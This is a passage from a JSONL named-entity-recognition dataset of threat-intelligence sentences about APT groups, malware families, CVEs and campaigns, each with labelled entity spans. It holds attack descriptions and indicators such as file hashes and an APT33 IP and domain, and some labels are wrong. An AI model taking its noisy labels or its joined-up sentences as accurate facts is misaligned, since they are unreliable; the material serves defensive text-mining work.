TinyZBot is a bot written in C# and developed by the Cleaver team .", "spans": {"MALWARE: SpyNote RAT": [[4, 15]], "MALWARE: Silence.Main Trojan": [[105, 124]], "MALWARE: TinyZBot": [[230, 238]], "TOOL: C#": [[259, 261]], "THREAT_ACTOR: Cleaver": [[283, 290]]}, "info": {"id": "cyberner_stix_train_000833", "source": "cyberner_stix_train"}} {"text": "In total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks . A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong .", "spans": {"THREAT_ACTOR: Scattered Canary": [[11, 27]], "VULNERABILITY: phishing": [[96, 104]], "FILEPATH: Bemstour": [[155, 163]], "VULNERABILITY: exploit": [[164, 171]]}, "info": {"id": "cyberner_stix_train_000834", "source": "cyberner_stix_train"}} {"text": "This one-line powershell command , stored only in WMI database , establishes an encrypted connection to C2 and downloads additional powershell modules from it , executing them in memory .", "spans": {"TOOL: powershell": [[14, 24], [132, 142]], "TOOL: WMI": [[50, 53]], "TOOL: C2": [[104, 106]]}, "info": {"id": "cyberner_stix_train_000835", "source": "cyberner_stix_train"}} {"text": "Kyrgyzstan Ministry of Foreign Affairs :", "spans": {"ORGANIZATION: Kyrgyzstan Ministry of Foreign Affairs": [[0, 38]]}, "info": {"id": "cyberner_stix_train_000836", "source": "cyberner_stix_train"}} {"text": "In these cases , CozyDuke was instructed by its C&C server to download and execute OnionDuke toolset .", "spans": {"MALWARE: CozyDuke": [[17, 25]], "TOOL: C&C": [[48, 51]], "MALWARE: OnionDuke": [[83, 92]]}, "info": {"id": "cyberner_stix_train_000837", "source": "cyberner_stix_train"}} {"text": "After it is launched , GolfSpy will generate a unique ID for the affected device and then collect its data such as SMS , contact list , location , and accounts in this format : “ % , [ ] , time ” ( 
shown in Figure 4 ) . The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises ( SWC ) . Moreover , the builder allows these to modify different IOCs , such as the filenames of wscript.exe or sctasks.exe copies , etc . This is when threat actors create a suite of malware tools and offer them up for sale on illicit websites .", "spans": {"MALWARE: GolfSpy": [[23, 30]], "THREAT_ACTOR: ScarCruft group": [[224, 239]], "TOOL: SWC": [[335, 338]], "TOOL: IOCs": [[399, 403]], "FILEPATH: wscript.exe": [[431, 442]], "FILEPATH: sctasks.exe": [[446, 457]], "THREAT_ACTOR: threat actors": [[486, 499]], "TOOL: a suite of malware tools": [[507, 531]]}, "info": {"id": "cyberner_stix_train_000838", "source": "cyberner_stix_train"}} {"text": "Given previous operational security errors from this actor in the past which resulted in exfiltrated content being publicly accessible Lookout Threat Intelligence is continuing to map out infrastructure and closely monitor their continued evolution . We believe Lazarus started this watering hole attack at the end of 2016 after their other operation was interrupted in South East Asia . If successfully exploited on an unpatched computer , the vulnerability could permit an attacker to install any file on the computer , which effectively permits code execution on the targeted computer . This gave them the ability to launch an unprecedented number of attacks within a short time frame and across a massive scale .", "spans": {"ORGANIZATION: Lookout Threat Intelligence": [[135, 162]], "THREAT_ACTOR: Lazarus": [[262, 269]]}, "info": {"id": "cyberner_stix_train_000839", "source": "cyberner_stix_train"}} {"text": "This gives JavaScript run in the WebView access to this method . Bahamut was shown to be resourceful , not only maintaining their own Android malware but running propaganda sites , although the quality of these activities varied noticeably . 
This simply deletes the ZxShell service key from the Windows registry ( using SHDeleteKey Api ) and all of the subkeys . The second , CVE-2022 - 41080 , has not been publicly detailed but its CVSS score of 8.8 is the same as CVE-2022 - 41040 used in the ProxyNotShell exploit chain , and it has been marked “ exploitation more likely . ”", "spans": {"THREAT_ACTOR: Bahamut": [[65, 72]], "TOOL: Android malware": [[134, 149]], "MALWARE: ZxShell": [[266, 273]], "SYSTEM: Windows": [[295, 302]], "VULNERABILITY: CVE-2022 - 41080": [[376, 392]], "VULNERABILITY: CVE-2022 - 41040": [[467, 483]]}, "info": {"id": "cyberner_stix_train_000840", "source": "cyberner_stix_train"}} {"text": "After landing on the victim ’ s phone , the RuMMS apps will request device administrator privileges , remove their icons to hide themselves from users , and remain running in the background to perform a series of malicious behaviors . In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown . Ssdeep : 768:5KCB8tnh7oferuHpC0xw+hnF4J7EyKfJ : oI8XoWruHpp/P4 . COSMICENERGY accomplishes this via its two derivative components , which we track as PIEHOP and LIGHTWORK ( see appendices for technical analyses ) .", "spans": {"MALWARE: RuMMS": [[44, 49]], "THREAT_ACTOR: activity groups": [[274, 289]], "THREAT_ACTOR: PROMETHIUM": [[292, 302]], "THREAT_ACTOR: NEODYMIUM": [[307, 316]], "VULNERABILITY: zeroday exploit": [[375, 390]], "TOOL: Ssdeep": [[438, 444]], "MALWARE: COSMICENERGY": [[503, 515]], "MALWARE: PIEHOP": [[588, 594]], "MALWARE: LIGHTWORK": [[599, 608]]}, "info": {"id": "cyberner_stix_train_000841", "source": "cyberner_stix_train"}} {"text": "Exfiltrated device information and additional sensitive data sent to the C2 server . 
The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . The Ke3chang attackers have been active since at least 2010 .", "spans": {"TOOL: python script": [[148, 161]], "VULNERABILITY: CVE-2017-0144": [[217, 230]], "MALWARE: errr.aspx": [[279, 288]], "THREAT_ACTOR: Ke3chang": [[304, 312]], "THREAT_ACTOR: attackers": [[313, 322]]}, "info": {"id": "cyberner_stix_train_000842", "source": "cyberner_stix_train"}} {"text": "A commonly observed element of implants from VOODOO BEAR — at least until this information was made public in late 2014 — were references in the malware to the 1965 science fiction novel Dune , by Frank Herbert . The threat actor’s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": {"THREAT_ACTOR: VOODOO BEAR": [[45, 56]], "THREAT_ACTOR: actor’s": [[224, 231]], "TOOL: emails": [[232, 238]], "FILEPATH: malicious payload": [[285, 302]], "ORGANIZATION: users": [[367, 372]]}, "info": {"id": "cyberner_stix_train_000843", "source": "cyberner_stix_train"}} {"text": "READ_CONTACTS - Allows the application to read the user 's contacts data . The Carbanak group , which has a long track record of compromising infrastructure belonging to financial institutions , is still active . 
Additionally , during that time , members of Gorgon Group were also performing criminal operations against targets across the globe , often using shared infrastructure with their targeted attack operations .", "spans": {"THREAT_ACTOR: Carbanak": [[79, 87]], "ORGANIZATION: financial": [[170, 179]], "THREAT_ACTOR: Gorgon Group": [[258, 270]], "MALWARE: shared infrastructure": [[359, 380]]}, "info": {"id": "cyberner_stix_train_000844", "source": "cyberner_stix_train"}} {"text": "This screen persists on the screen and prevents the user from using the navigation buttons . The group 's primary goal is demonstrating to companies that they have weak security . Remsec uses a Lua interpreter to run Lua modules which perform various functions .", "spans": {"MALWARE: Remsec": [[180, 186]], "MALWARE: Lua interpreter": [[194, 209]], "MALWARE: Lua modules": [[217, 228]]}, "info": {"id": "cyberner_stix_train_000845", "source": "cyberner_stix_train"}} {"text": "Links between XLoader and FakeSpy can give clues to the much broader inner workings of the threat actors behind them . We believe that APT28 's targeting of the MOD aligns with Russian threat perceptions . In our sample traffic, after executing the commands sent via cmd.exe , Glimpse writes the output of the commands in the sendbox directory to the appropriate file names (e.g., 10100 or 10140) prepended with proc (e.g., ) . 
Although COSMICENERGY does not directly overlap with any previously observed malware families , its capabilities are comparable to those employed in previous incidents and malware .", "spans": {"MALWARE: XLoader": [[14, 21]], "MALWARE: FakeSpy": [[26, 33]], "THREAT_ACTOR: APT28": [[135, 140]], "FILEPATH: cmd.exe": [[267, 274]], "MALWARE: Glimpse": [[277, 284]], "MALWARE: COSMICENERGY": [[437, 449]]}, "info": {"id": "cyberner_stix_train_000846", "source": "cyberner_stix_train"}} {"text": "In some cases , TrickMo may use this feature to intercept SMS messages without the knowledge of the user by activating the lockdown screen and intercepting SMS messages in the background . It is worth noting that during our investigation f-secure uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances . The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information .", "spans": {"MALWARE: TrickMo": [[16, 23]], "THREAT_ACTOR: Callisto": [[306, 314]], "FILEPATH: cmd.exe": [[479, 486]]}, "info": {"id": "cyberner_stix_train_000847", "source": "cyberner_stix_train"}} {"text": ". Silence attacked financial organisations in the UK . In a recent spear-phishing campaign , the Cobalt Group used a known CVE to connect to its C&C server via Cobalt Strike , but ended up revealing all targets .", "spans": {"THREAT_ACTOR: Silence": [[2, 9]], "ORGANIZATION: financial": [[19, 28]], "THREAT_ACTOR: Cobalt Group": [[97, 109]], "TOOL: C&C": [[145, 148]], "MALWARE: Cobalt Strike": [[160, 173]]}, "info": {"id": "cyberner_stix_train_000848", "source": "cyberner_stix_train"}} {"text": "Note : TERBIUM establishes a foothold throughout the organization and does not proceed with the destructive wiping operation until a specific date/time : November 17 , 2016 at 8:45 p.m . 
Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) .", "spans": {"THREAT_ACTOR: TERBIUM": [[7, 14]], "MALWARE: .doc files": [[241, 251]], "FILEPATH: RTF documents": [[272, 285]], "VULNERABILITY: exploit": [[302, 309]], "VULNERABILITY: CVE-2017-8570": [[310, 323]], "TOOL: Composite Moniker": [[326, 343]]}, "info": {"id": "cyberner_stix_train_000849", "source": "cyberner_stix_train"}} {"text": "These two documents shared multiple data artifacts , such as a shared C2 IP , shared author name , and shared tactics .", "spans": {"TOOL: C2": [[70, 72]]}, "info": {"id": "cyberner_stix_train_000850", "source": "cyberner_stix_train"}} {"text": "The first part of the campaign From Jan. 23 , 2018 , to Feb. 26 , 2018 used a macro-based document that dropped a VBS file and an INI file . Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 .", "spans": {"MALWARE: VBS file": [[114, 122]], "MALWARE: INI file": [[130, 138]], "THREAT_ACTOR: Lotus Blossom": [[141, 154]], "VULNERABILITY: exploit": [[173, 180]], "VULNERABILITY: CVE-2014-6332": [[181, 194]], "MALWARE: Emissary Trojan": [[227, 242]]}, "info": {"id": "cyberner_stix_train_000851", "source": "cyberner_stix_train"}} {"text": "] com , lending further credence the remaining two domains , gooledriveservice [ . We’ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 . 
We assess APT33 works at the behest of the Iranian government .", "spans": {"THREAT_ACTOR: BalkanDoor": [[117, 127]], "VULNERABILITY: CVE-2018-20250": [[217, 231]], "THREAT_ACTOR: APT33": [[244, 249]]}, "info": {"id": "cyberner_stix_train_000852", "source": "cyberner_stix_train"}} {"text": "Customized evasion based on victim profile – The campaign used a publicly available technique to evade AppLocker application whitelisting applied to the targeted systems .", "spans": {"TOOL: Customized evasion based on victim profile": [[0, 42]]}, "info": {"id": "cyberner_stix_train_000853", "source": "cyberner_stix_train"}} {"text": "To traverse the firewall , C2 traffic for most TG-3390 tools occurs over ports 53 , 80 , and 443 .", "spans": {"TOOL: firewall": [[16, 24]], "TOOL: C2": [[27, 29]], "THREAT_ACTOR: TG-3390": [[47, 54]]}, "info": {"id": "cyberner_stix_train_000854", "source": "cyberner_stix_train"}} {"text": "We identified campaigns targeting Thai users and their devices . But even though they share the use of Winnti , the BARIUM and LEAD activity groups are involved in very different intrusion scenarios . In some cases , the compromised servers are hosted on target organizations ’ networks after successful infiltration so the attackers can increase their control of the victims ’ infrastructure . 
Instead , victims would end up infecting their computers with the NetSupport RAT , allowing threat actors to gain remote access and deliver additional payloads .", "spans": {"TOOL: Winnti": [[103, 109]], "TOOL: BARIUM": [[116, 122]], "TOOL: LEAD": [[127, 131]], "ORGANIZATION: victims": [[405, 412]], "TOOL: NetSupport RAT": [[461, 475]]}, "info": {"id": "cyberner_stix_train_000855", "source": "cyberner_stix_train"}} {"text": "First , when a specific recipient was targeted , the mails often purported to be meeting invitations from established business partners .", "spans": {}, "info": {"id": "cyberner_stix_train_000856", "source": "cyberner_stix_train"}} {"text": "These ransomware payloads only seem to target Korean systems , since they won’t execute if the system language is not Korean . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": {"TOOL: ransomware": [[6, 16]], "MALWARE: Carbanak": [[147, 155]], "THREAT_ACTOR: criminals": [[222, 231]], "ORGANIZATION: financial industry": [[272, 290]], "ORGANIZATION: customers": [[314, 323]]}, "info": {"id": "cyberner_stix_train_000857", "source": "cyberner_stix_train"}} {"text": "In 2015 , Suckfly conducted a multistage attack between April 22 and May 4 against an e-commerce organization based in India .", "spans": {"THREAT_ACTOR: Suckfly": [[10, 17]]}, "info": {"id": "cyberner_stix_train_000858", "source": "cyberner_stix_train"}} {"text": "RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself . 
Barium Defendants install the malicious \" Win32/Barlaiy \" malware and the malicious \" Win32/PlugX.L \" malware on victim computers using the means described above .", "spans": {"MALWARE: RIPPER": [[0, 6]], "ORGANIZATION: ATM vendors": [[77, 88]], "THREAT_ACTOR: Barium": [[143, 149]], "MALWARE: Win32/Barlaiy": [[185, 198]], "MALWARE: Win32/PlugX.L": [[229, 242]]}, "info": {"id": "cyberner_stix_train_000859", "source": "cyberner_stix_train"}} {"text": "The increasing sophistication of surveillanceware The structure of the surveillanceware indicates it is very sophisticated . From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world . Each Svchost group can contain one or more service names that are extracted from the following registry key , whose Parameters key contains a ServiceDLL value : HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Service . The final payload of the July 2023 campaign is njRAT , which increases our confidence that the threat actor 's goals are information stealing and remote control of the targeted systems .", "spans": {"ORGANIZATION: embassies": [[202, 211]], "TOOL: Svchost": [[260, 267]], "TOOL: ServiceDLL": [[397, 407]], "MALWARE: njRAT": [[526, 531]]}, "info": {"id": "cyberner_stix_train_000860", "source": "cyberner_stix_train"}} {"text": "Name winexesvc.exe Size 23552 MD5 77e7fb6b56c3ece4ef4e93b6dc608be0 SHA1 f46f84e53263a33e266aae520cb2c1bd0a73354e SHA256 5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d .", "spans": {"FILEPATH: winexesvc.exe": [[5, 18]], "FILEPATH: 77e7fb6b56c3ece4ef4e93b6dc608be0": [[34, 66]], "FILEPATH: f46f84e53263a33e266aae520cb2c1bd0a73354e": [[72, 112]], "FILEPATH: 5130f600cd9a9cdc82d4bad938b20cbd2f699aadb76e7f3f1a93602330d9997d": [[120, 184]]}, "info": {"id": "cyberner_stix_train_000861", "source": "cyberner_stix_train"}} {"text": "INDRIK SPIDER isn't the only criminal actor running big game hunting operations ; The 
first ransomware to stake a claim for big game hunting was Samas ( aka SamSam ) , which is developed and operated by BOSS SPIDER . The threat actor used an exploit from the arsenal of the state-sponsored hacker group APT28 .", "spans": {"TOOL: ransomware": [[92, 102]], "TOOL: Samas": [[145, 150]], "TOOL: SamSam": [[157, 163]], "VULNERABILITY: exploit": [[242, 249]], "THREAT_ACTOR: APT28": [[303, 308]]}, "info": {"id": "cyberner_stix_train_000862", "source": "cyberner_stix_train"}} {"text": "] somtum [ . In addition to the campaign in Myanmar , Mofang has been observed to attack targets across multiple sectors ( government , military , critical infrastructure and the automotive and weapon industries ) in multiple countries . Such a move requires recoding malware , updating infrastructure , and possibly retraining workers on new processes . Our investigation revealed that the files created on the Exchange servers were owned by the user NT AUTHORITY\\SYSTEM , a privileged local account on the Windows operating system .", "spans": {"THREAT_ACTOR: Mofang": [[54, 60]], "ORGANIZATION: government": [[123, 133]], "ORGANIZATION: military": [[136, 144]], "ORGANIZATION: critical infrastructure": [[147, 170]], "ORGANIZATION: automotive": [[179, 189]], "ORGANIZATION: weapon industries": [[194, 211]]}, "info": {"id": "cyberner_stix_train_000863", "source": "cyberner_stix_train"}} {"text": "] 141 2020-04-26 In the course of the investigation , the team discovered a potential link to an additional Android infostealer . The backdoor can connect to any of the C&Cs from a hardcoded list – a measure to increase resilience . 
ChopShop1 is a new framework developed by the MITRE Corporation for network-based protocol decoders that enable security professionals to understand actual commands issued by human operators controlling endpoints .", "spans": {"MALWARE: Android infostealer": [[108, 127]], "MALWARE: backdoor": [[134, 142]], "FILEPATH: ChopShop1": [[233, 242]], "ORGANIZATION: MITRE Corporation": [[279, 296]]}, "info": {"id": "cyberner_stix_train_000864", "source": "cyberner_stix_train"}} {"text": "HenBox : The Chickens Come Home to Roost March 13 , 2018 at 5:00 AM Unit 42 recently discovered a new Android malware family we named “ HenBox ” masquerading as a variety of legitimate Android apps . Talos now has moderate confidence that the threat actors behind Sea Turtle have been using another DNS hijacking technique . An APT gang linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong .", "spans": {"MALWARE: HenBox": [[0, 6], [136, 142]], "SYSTEM: Android": [[102, 109], [185, 192]], "ORGANIZATION: Talos": [[200, 205]], "THREAT_ACTOR: gang": [[332, 336]], "ORGANIZATION: governments": [[420, 431]]}, "info": {"id": "cyberner_stix_train_000865", "source": "cyberner_stix_train"}} {"text": "The base64 encoded content downloaded from the Pastebin link is then decoded to an executable and dropped on the system .", "spans": {"TOOL: base64 encoded content": [[4, 26]], "TOOL: Pastebin": [[47, 55]]}, "info": {"id": "cyberner_stix_train_000866", "source": "cyberner_stix_train"}} {"text": "In the areas marked ‘ { text } ’ Rotexy displays the text it receives from the C & C . Like PLEAD , Shrouded Crossbow uses spear-phishing emails with backdoor-laden attachments that utilize the RTLO technique and accompanied by decoy documents . 
Active since at least 2014 , the Leviathan has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe .", "spans": {"MALWARE: Rotexy": [[33, 39]], "TOOL: RTLO technique": [[194, 208]], "MALWARE: decoy documents": [[228, 243]], "THREAT_ACTOR: Leviathan": [[279, 288]], "ORGANIZATION: maritime industries": [[319, 338]], "ORGANIZATION: naval defense contractors": [[341, 366]], "ORGANIZATION: research institutions": [[384, 405]]}, "info": {"id": "cyberner_stix_train_000867", "source": "cyberner_stix_train"}} {"text": "By Claud Xiao September 13 , 2016 at 5:00 AM Over the past two years , we ’ ve observed many cases of Microsoft Windows and Apple iOS malware designed to attack mobile devices . In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors . The group was attributed as the actor behind the Korea Hydro & Nuclear Power Co.compromise .", "spans": {"SYSTEM: Microsoft Windows": [[102, 119]], "SYSTEM: Apple iOS": [[124, 133]], "MALWARE: Okrum malware": [[232, 245]], "MALWARE: Ketrican backdoors": [[262, 280]], "ORGANIZATION: Korea Hydro & Nuclear Power Co.compromise": [[377, 418]]}, "info": {"id": "cyberner_stix_train_000868", "source": "cyberner_stix_train"}} {"text": "Hunter — A web application scanning tool written by @tojen to identify vulnerabilities in Apache Tomcat , Red Hat JBoss Middleware , and Adobe ColdFusion .", "spans": {"TOOL: Hunter": [[0, 6]], "TOOL: Apache Tomcat": [[90, 103]], "TOOL: Red Hat JBoss Middleware": [[106, 130]], "TOOL: Adobe ColdFusion": [[137, 153]]}, "info": {"id": "cyberner_stix_train_000869", "source": "cyberner_stix_train"}} {"text": "] addroider.com ’ . Our investigations revealed that the attackers drove around several cities in Russia , stealing money from ATMs belonging to different banks . 
There is no evidence that Suckfly gained any benefits from attacking the government organizations , but someone else may have benefited from these attacks .", "spans": {"THREAT_ACTOR: attackers": [[57, 66]], "ORGANIZATION: banks": [[155, 160]], "ORGANIZATION: government organizations": [[236, 260]]}, "info": {"id": "cyberner_stix_train_000870", "source": "cyberner_stix_train"}} {"text": "Outlaw Updates Kit to Kill Older Miner Versions , Targets More Systems .", "spans": {"THREAT_ACTOR: Outlaw": [[0, 6]]}, "info": {"id": "cyberner_stix_train_000871", "source": "cyberner_stix_train"}} {"text": "This creates a chain of events that triggers the automatic pop-up of the ransomware screen without doing infinite redraw or posing as system window . We believe that the Ke3chang attackers are operating out of China and have been active since at least 2010 . Currently malware with the obfuscations is limited , We would also like to thank Trellix for our continued partnership and for providing supporting detection YARA rules and associated indicators .", "spans": {"THREAT_ACTOR: Ke3chang": [[170, 178]], "THREAT_ACTOR: attackers": [[179, 188]], "ORGANIZATION: Trellix": [[340, 347]], "MALWARE: YARA rules": [[417, 427]]}, "info": {"id": "cyberner_stix_train_000872", "source": "cyberner_stix_train"}} {"text": "Translate on the fly the objects the server send to mirrored matching client objects ( will not work if client doesn’t have this object , or renamed it ) .", "spans": {}, "info": {"id": "cyberner_stix_train_000873", "source": "cyberner_stix_train"}} {"text": "The big first buffer is used as index for multiple concurrent threads . This Trojan is related to the Elise backdoor described in the Operation Lotus Blossom report . Thus , we do not know the exact purpose of this malicious service . 
The log messages recorded in the nslog can include connection statistics for SSLVPN and ICA proxy sessions .", "spans": {"TOOL: Elise backdoor": [[102, 116]], "SYSTEM: SSLVPN": [[312, 318]], "SYSTEM: ICA proxy": [[323, 332]]}, "info": {"id": "cyberner_stix_train_000874", "source": "cyberner_stix_train"}} {"text": "] com hxxp : //www [ . The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . Carbon Black product specific content can be located in the User Exchange . certutil.exe", "spans": {"THREAT_ACTOR: group": [[27, 32]], "VULNERABILITY: Flash exploits": [[76, 90]], "TOOL: Carberp": [[108, 115]], "TOOL: JHUHUGIT downloaders": [[122, 142]], "ORGANIZATION: Carbon Black": [[175, 187]], "TOOL: User Exchange": [[235, 248]], "TOOL: certutil.exe": [[251, 263]]}, "info": {"id": "cyberner_stix_train_000875", "source": "cyberner_stix_train"}} {"text": "In either case , PLATINUM would need to have gained administrative privileges on targeted systems prior to the feature 's misuse . Attackers then moved on to the motor industry in late May .", "spans": {"THREAT_ACTOR: PLATINUM": [[17, 25]], "ORGANIZATION: motor industry": [[162, 176]]}, "info": {"id": "cyberner_stix_train_000876", "source": "cyberner_stix_train"}} {"text": "It is now clear that after being implicated in the U.S. 
presidential election attacks in late 2016 , APT28 was undeterred by the resulting publicity and continues to mount further attacks using its existing tools .", "spans": {"ORGANIZATION: presidential election": [[56, 77]], "THREAT_ACTOR: APT28": [[101, 106]]}, "info": {"id": "cyberner_stix_train_000877", "source": "cyberner_stix_train"}} {"text": "These vulnerabilities include :", "spans": {}, "info": {"id": "cyberner_stix_train_000878", "source": "cyberner_stix_train"}} {"text": "Application of the data remains challenging , and so to continue our initiative of establishing playbooks for adversary groups , we have added this attack campaign as the next playbook in our dataset .", "spans": {}, "info": {"id": "cyberner_stix_train_000879", "source": "cyberner_stix_train"}} {"text": "ESET researchers analyze new TTPs attributed to the Turla group that leverage PowerShell to run malware in-memory only . The group will also use a compromised account to create scheduled tasks on systems or modify legitimate Windows services to install the HIGHNOON and SOGU backdoors . APT41 uses multiple methods to perform lateral movement in an environment , including RDP sessions , using stolen credentials , adding accounts to User and Admin groups , and password brute-forcing utilities . To maintain presence , APT41 relies on backdoors , a Sticky Keys vulnerability , scheduled tasks , bootkits , rootkits , registry modifications , and creating or modifying startup files . APT41 leveraged ROCKBOOT as a persistence mechanism for PHOTO and TERA backdoors . 
APT41 has also been observed modifying firewall rules to enable file and printer sharing to allow for inbound Server Message Block (SMB) traffic .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "THREAT_ACTOR: Turla": [[52, 57]], "TOOL: PowerShell": [[78, 88]], "SYSTEM: Windows": [[225, 232]], "MALWARE: HIGHNOON": [[257, 265]], "MALWARE: SOGU backdoors": [[270, 284]], "THREAT_ACTOR: APT41": [[287, 292], [520, 525], [685, 690], [768, 773]], "MALWARE: Sticky Keys": [[550, 561]], "MALWARE: scheduled tasks": [[578, 593]], "MALWARE: bootkits": [[596, 604]], "MALWARE: rootkits": [[607, 615]], "MALWARE: registry modifications": [[618, 640]], "MALWARE: ROCKBOOT": [[701, 709]], "TOOL: Server Message Block": [[878, 898]], "TOOL: (SMB)": [[899, 904]]}, "info": {"id": "cyberner_stix_train_000880", "source": "cyberner_stix_train"}} {"text": "be92a751e5abbcd24151b509dbb4feb98ea46f367a99d6f86ed4a7c162461e31 5c4d666cef84abc2a1ffd3b1060ef28fa3c6c3bb4fad1fa26db99350b41bea4c 06081ab7faa729e33b9397a0e47548e75cbec3d43c50e6368e81d737552150a5 753999cb19a4346042f973e30cf1158c44f2335ab65859d3bfa16bca4098e2ef While North Korean cyber operations against specific countries may have been driven by diplomatic factors and perceived insults against Pyongyang , the application of increasingly restrictive and numerous financial sanctions against North Korea probably contributed to the formation of APT38 . you should read his blog post . Continual education for employees to spot phishing attacks is also a key , basic measure with todays threat landscape .", "spans": {"ORGANIZATION: financial sanctions": [[465, 484]], "THREAT_ACTOR: APT38": [[546, 551]]}, "info": {"id": "cyberner_stix_train_000881", "source": "cyberner_stix_train"}} {"text": "Some indicators may come in the form of peculiar behavior such as unexpected rebooting , finding unfamiliar apps installed , or instant messaging apps suddenly freezing . 
In a recent spear-phishing campaign , the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike . Additionally here is no mapping information in MMAT_GLBOPT2 because the condition block that contains the variable has been deleted . The response of the initial sent packet knock contains some commands to be executed on the victim machine", "spans": {"THREAT_ACTOR: Cobalt Hacking Group": [[213, 233]], "TOOL: Cobalt Strike": [[355, 368]], "TOOL: MMAT_GLBOPT2": [[418, 430]], "ORGANIZATION: victim machine": [[596, 610]]}, "info": {"id": "cyberner_stix_train_000882", "source": "cyberner_stix_train"}} {"text": "DustySky is a campaign which others have attributed to the Gaza Cybergang group , a group that targets government interests in the region .", "spans": {"THREAT_ACTOR: Gaza Cybergang group": [[59, 79]]}, "info": {"id": "cyberner_stix_train_000883", "source": "cyberner_stix_train"}} {"text": "Take a screenshot of any app in foreground . The group 's targets include a number of organizations and individuals located in Russia . The tactics , techniques , and procedures ( TTPs ) , content , and theme of the decoy documents , as well as the victimology observed in the campaign , resemble previous attacks that have targeted Palestinians . Researchers at Akamai reported on a Magecart skimmer campaign disguised as Google Tag Manager that also made the news with the compromise of one of Canada 's largest liquor store ( LCBO ) .", "spans": {"ORGANIZATION: Akamai": [[363, 369]], "TOOL: Google Tag Manager": [[423, 441]], "ORGANIZATION: Canada 's largest liquor store ( LCBO )": [[496, 535]]}, "info": {"id": "cyberner_stix_train_000884", "source": "cyberner_stix_train"}} {"text": "Using intel from this research , we have made Office 365 ATP more resistant to FinFisher ’ s anti-sandbox checks . First released in 2005 , the tool has gone unchanged since 2008 with v ersion 2.3.2 . 
The backdoor DLL is stored in the .rdata section of the launcher , compressed with LZMA , and encrypted with RC4 . However , given the lack of conclusive evidence , we consider it also possible that a different actor - either with or without permission - reused code associated with the cyber range to develop this malware .", "spans": {"SYSTEM: Office 365 ATP": [[46, 60]], "MALWARE: FinFisher": [[79, 88]], "TOOL: DLL": [[214, 217]], "TOOL: LZMA": [[284, 288]], "TOOL: RC4": [[310, 313]], "VULNERABILITY: reused code associated with the cyber range to develop this malware": [[456, 523]]}, "info": {"id": "cyberner_stix_train_000885", "source": "cyberner_stix_train"}} {"text": "Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows .", "spans": {"MALWARE: malicious.DOC": [[86, 99]], "VULNERABILITY: Microsoft Common Controls vulnerability": [[119, 158]], "VULNERABILITY: CVE-2012-0158": [[161, 174]], "VULNERABILITY: exploit": [[248, 255]], "ORGANIZATION: Microsoft": [[264, 273], [377, 386]], "SYSTEM: Windows": [[274, 281], [387, 394]], "TOOL: OLE Remote Code Execution": [[282, 307]], "VULNERABILITY: Vulnerability": [[308, 321]], "VULNERABILITY: CVE-2014-6332": [[324, 337]]}, "info": {"id": "cyberner_stix_train_000886", "source": "cyberner_stix_train"}} {"text": "Under a model known as sandboxing , most Android apps are n't permitted to access passwords or other data available to most other apps . There are several indicators , which have led CTU researchers to believe with high confidence that NICKEL ACADEMY is behind the current spearphishing campaign . APT33 : 91.230.121.144 remserver.ddns.net . 
A rough translation of this message is as follows : Hack520 seems to be very interested in hosting services and his profile fits that of a system administrator profile with some programming and hacking skills .", "spans": {"SYSTEM: Android": [[41, 48]], "ORGANIZATION: CTU": [[183, 186]], "THREAT_ACTOR: NICKEL ACADEMY": [[236, 250]], "THREAT_ACTOR: APT33": [[298, 303]], "IP_ADDRESS: 91.230.121.144": [[306, 320]], "DOMAIN: remserver.ddns.net": [[321, 339]], "THREAT_ACTOR: Hack520": [[394, 401]]}, "info": {"id": "cyberner_stix_train_000887", "source": "cyberner_stix_train"}} {"text": "This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name — either KBDLV2.DLL or AUTO.DLL , depending on the malware sample .", "spans": {"MALWARE: bait document": [[5, 18]], "MALWARE: Word document": [[68, 81]], "VULNERABILITY: CVE-2012-0158": [[102, 115]], "SYSTEM: Windows": [[346, 353]], "FILEPATH: KBDLV2.DLL": [[400, 410]], "FILEPATH: AUTO.DLL": [[414, 422]]}, "info": {"id": "cyberner_stix_train_000888", "source": "cyberner_stix_train"}} {"text": "The following tools appear to be exclusive to TG-3390 : OwaAuth web shell — A web shell and credential stealer deployed to Microsoft Exchange servers .", "spans": {"THREAT_ACTOR: TG-3390": [[46, 53]], "MALWARE: OwaAuth": 